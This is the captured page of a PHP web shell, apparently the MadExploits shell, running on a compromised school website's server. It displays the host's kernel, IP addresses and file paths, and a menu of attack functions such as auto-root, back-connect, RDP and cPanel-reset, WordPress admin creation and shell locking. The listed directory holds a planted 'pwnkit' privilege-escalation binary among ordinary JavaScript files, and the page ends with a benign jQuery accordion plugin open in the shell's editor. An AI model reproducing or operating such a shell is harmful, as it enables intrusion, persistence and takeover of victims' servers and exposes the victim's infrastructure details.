Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.218.1.38
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
nbspublicschool /
public_html /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
slider
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
countdown.js
2.33
KB
-rw-r--r--
counter.plugin.js
919
B
-rw-r--r--
css.php
146
B
-rw-r--r--
custom.js
3.96
KB
-rw-r--r--
imagelightbox.min.js
4.6
KB
-rw-r--r--
isotope-docs.min.js
79.73
KB
-rw-r--r--
jquery.bxslider.min.js
18.91
KB
-rw-r--r--
jquery.flexslider-min.js
21.82
KB
-rw-r--r--
jquery.js
93.63
KB
-rw-r--r--
jquery.nicescroll.min.js
59.12
KB
-rw-r--r--
light_box_img.js
751
B
-rw-r--r--
menu.responsive.js
693
B
-rw-r--r--
modernizr.js
14.89
KB
-rw-r--r--
parallax.materialize.js
126.33
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
scroll.menu.js
1.46
KB
-rw-r--r--
slick.min.js
39.51
KB
-rw-r--r--
smk-accordion.js
3.24
KB
-rw-r--r--
sticky.menu.js
12.39
KB
-rw-r--r--
uikit.min.js
52.85
KB
-rw-r--r--
video.lightning.js
9.15
KB
-rw-r--r--
waypoints.min.js
7.86
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : smk-accordion.js
;(function ( $ ) { $.fn.smk_Accordion = function( options ) { if (this.length > 1){ this.each(function() { $(this).smk_Accordion(options); }); return this; } // Defaults var settings = $.extend({ animation: true, showIcon: true, closeAble: false, closeOther: true, slideSpeed: 350, activeIndex: false }, options ); if( $(this).data('close-able') ) settings.closeAble = $(this).data('close-able'); if( $(this).data('animation') ) settings.animation = $(this).data('animation'); if( $(this).data('show-icon') ) settings.showIcon = $(this).data('show-icon'); if( $(this).data('close-other') ) settings.closeOther = $(this).data('close-other'); if( $(this).data('slide-speed') ) settings.slideSpeed = $(this).data('slide-speed'); if( $(this).data('active-index') ) settings.activeIndex = $(this).data('active-index'); // Cache current instance // To avoid scope issues, use 'plugin' instead of 'this' // to reference this class from internal events and functions. var plugin = this; //"Constructor" var init = function() { plugin.createStructure(); plugin.clickHead(); } // Add .smk_accordion class this.createStructure = function() { //Add Class plugin.addClass('smk_accordion'); if( settings.showIcon ){ plugin.addClass('acc_with_icon'); } //Create sections if they were not created already if( plugin.find('.accordion_in').length < 1 ){ plugin.children().addClass('accordion_in'); } //Add classes to accordion head and content for each section plugin.find('.accordion_in').each(function(index, elem){ var childs = $(elem).children(); $(childs[0]).addClass('acc_head'); $(childs[1]).addClass('acc_content'); }); //Append icon if( settings.showIcon ){ plugin.find('.acc_head').prepend('<div class="acc_icon_expand"></div>'); } //Hide inactive plugin.find('.accordion_in .acc_content').not('.acc_active .acc_content').hide(); //Active index if( settings.activeIndex === parseInt(settings.activeIndex) ){ if(settings.activeIndex === 0){ plugin.find('.accordion_in').addClass('acc_active').show(); plugin.find('.accordion_in .acc_content').addClass('acc_active').show(); } else{ plugin.find('.accordion_in').eq(settings.activeIndex - 1).addClass('acc_active').show(); plugin.find('.accordion_in .acc_content').eq(settings.activeIndex - 1).addClass('acc_active').show(); } } } // Action when the user click accordion head this.clickHead = function() { plugin.on('click', '.acc_head', function(){ var s_parent = $(this).parent(); if( s_parent.hasClass('acc_active') == false ){ if( settings.closeOther ){ plugin.find('.acc_content').slideUp(settings.slideSpeed); plugin.find('.accordion_in').removeClass('acc_active'); } } if( s_parent.hasClass('acc_active') ){ if( false !== settings.closeAble ){ s_parent.children('.acc_content').slideUp(settings.slideSpeed); s_parent.removeClass('acc_active'); } } else{ $(this).next('.acc_content').slideDown(settings.slideSpeed); s_parent.addClass('acc_active'); } }); } //"Constructor" init init(); return this; }; }( jQuery ));
Close